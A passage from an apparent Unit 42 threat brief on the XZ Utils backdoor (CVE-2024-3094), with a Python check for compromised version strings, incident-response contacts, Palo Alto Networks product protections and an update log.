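    match = re.search(r"\b(\d+\.\d+\.\d+)", version_text)
    if match is None:
        raise ValueError("no version number found in input")
    return match.group(1) in COMPROMISED_UPSTREAM_VERSIONS


print(is_compromised_xz("xz (XZ Utils) 5.6.1\nliblzma 5.6.1"))
print(is_compromised_xz("xz (XZ Utils) 5.4.6\nliblzma 5.4.6"))
```

Taking the text as an argument, instead of invoking the binary from inside the function, keeps the check usable on inventory exports and avoids executing a potentially compromised tool.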

Conclusion

Unit 42 will continue to monitor the situation and will update this post as more information becomes available.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempted malicious activities across relevant Linux distributions used by our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for affected versions of XZ Utils.

Palo Alto Networks Product Protections for the XZ Utils Vulnerability

Based on the information presently known, Palo Alto Networks products and cloud services do not contain affected XZ software packages and are not impacted by these issues. Read our informational bulletin for more details.

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Advanced WildFire

The Next-Generation Firewall with cloud-delivered security services including Advanced WildFire detects the compromised versions described in this report as malicious, as well as features known to be associated with the backdoors.

Cortex XDR and XSIAM

Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach. Cortex customers using the Host Insights module can detect if the vulnerability exists on protected devices.

XDR customers can find and upgrade software vulnerable to this issue centrally from the XDR console. Our InfoSec SOC team used the following XQL query to find vulnerable versions of XZ on our endpoints:

Once you review the results, if you identify installations of software that need to be updated, you can execute an endpoint script on a particular software package. For example, to upgrade a vulnerable Homebrew installation on a list of Macs to the latest version (with the downgraded, safe version of XZ), you can execute the following commands via XDR on your endpoints.

The menu options to follow are: Incident Response → Action Center → Run Endpoint Script → Execute Commands.

GUI of Cortex XSIAM.
Figure 1. Cortex XSIAM Incident Response Action Center with Run Endpoint Script selected.

Prisma Cloud

Prisma Cloud has out-of-the-box detection capabilities in place that will help prevent the launch of images with CVE-2024-3094. Prisma Cloud’s agentless approach provides you with a comprehensive lifecycle overview from Code Repository to Cloud and simplified filter options that enable you to identify vulnerable hosts, high privilege access and potential exposure to the internet. Additionally, its defender component or pipeline integration offer real-time insights and protection capabilities, enabling you to prevent the launch of images with the CVE or detect and prevent anomalous behavior. Our researchers validated this capability relative to this CVE by committing a Dockerfile and then triggering a CI/CD pipeline to build and deploy the Docker image.

Additional Resources

Updated March 31, 2024, at 9:30 a.m. PT to add an additional XQL query and additional details about Cortex XDR protections.

Updated March 31, 2024, at 7:15 p.m. PT to add a link to additional info about Host Insights.

Updated April 1, 2024, at 8:15 a.m. PT to add info on Advanced WildFire protections.

Updated April 2, 2024, at 10 a.m. PT to add a link to the Palo Alto Networks Product Security Assurance team's assessment that PANW products and cloud services are not impacted by these issues.

Updated April 3, 2024, at 1:45 p.m. PT to expand Cortex XDR product protection information on endpoints. 

Updated April 11, 2024, at 12:45 p.m. PT to add to Additional Resources section.